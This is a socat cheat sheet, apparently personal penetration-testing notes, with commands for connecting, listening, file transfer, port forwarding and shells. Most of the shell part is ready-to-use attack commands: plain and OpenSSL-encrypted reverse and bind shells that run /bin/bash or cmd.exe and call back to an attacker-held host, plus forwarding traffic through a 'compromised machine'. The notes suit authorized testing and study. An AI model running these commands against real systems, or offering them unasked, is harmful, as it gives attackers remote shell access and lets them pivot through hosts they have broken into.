Socat works by opening two bidirectional data streams (read/write), opening each one-by-one (blocking), and transfer data between the two. Data is only transferred when one stream has new data (read) and the other is accepting input (write). Otherwise, the new data is not read until the other stream accepts input.

Confusing Syntax Warning!

socat command arguments seem very non-intuitive to me at first.

Protocol names are case-insensitive

Protocol names, directives like EXEC, etc are all upper-case for consistency in the cheatsheet, however it is not required for socat to function.

Connect to Remote

socat - TCP4:$REMOTE_IP:$REMOTE_PORT

Listen on Host

socat TCP4-LISTEN:$HOST_PORT STDOUT

TCP4-LISTEN can be substituted for TCP4-L or even TCP-L

File

fileuploadfiledownload On file source

socat TCP-L:$SRC_PORT,fork file:$SRC_FILE

On file destination

socat TCP4:$SRC_IP:$SRC_PORT file:$DST_FILE,create

reverse shell

revshell On host (attacker)

socat -d -d TCP4-LISTEN:$HOST_PORT STDOUT

On remote

socat TCP4:$HOST_IP:$HOST_PORT EXEC:/bin/bash

Encrypted bind shell

bindshell

On remote, use this OpenSSL command to generate a certificate & key pair for encryption first and combine them into a single .pem file, which socat requires.

openssl req -newkey rsa:2048 -nodes -keyout rev_shell.key -x509 -days 362 -out bind_shell.crt
cat rev_shell.key bind_shell.crt >bind_shell.pem
  • -nodes: key stored without password
  • -x509: self-signed certificate, i.e. this will not be a certificate request

Then, start the listener on remote

socat OPENSSL-L:$REMOTE_PORT,cert=rev_shell.pem,verify=0,fork EXEC:$SHELL

cmd.exe

If the shell is cmd.exe, then an additional pipes option is needed (e.g., EXEC:cmd.exe,pipes)

On host

socat - OPENSSL:10.11.0.4:$REMOTE_PORT,verify=0

Encrypted reverse shell

revshell On host, generate certificate (see Encrypted Bind Shell)

openssl req -newkey rsa:2048 -nodes -keyout rev_shell.key -x509 -days 362 -out rev_shell.crt
cat rev_shell.key rev_shell.crt >rev_shell.pem

On host, start listener

socat OPENSSL-LISTEN:$HOST_PORT,cert=rev_shell.pem,verify=0,fork STDOUT

On remote

socat OPENSSL:$HOST_IP:$HOST_PORT,verify=0,fork EXEC:$SHELL

cmd.exe

If the shell is cmd.exe, then an additional pipes option is needed (e.g., EXEC:cmd.exe,pipes)

SSLify Server

socat OPENSSL-LISTEN:443,reuse‐addr,pf=ip4,fork,cert=server.pem,cafile=client.crt TCP4-CONNECT:localhost:80

Port Forwarding

See: port forwarding Assuming socat has been transferred onto the compromised machine:

socat TCP4-LISTEN:1234,fork TCP4:1.1.1.1:4321

This allows the attacker to forward traffic in the following way:

graph LR
    A[Attacker Port X] ---> B[Compromised Host Port 1234] ---> C[Target Host Port 4321]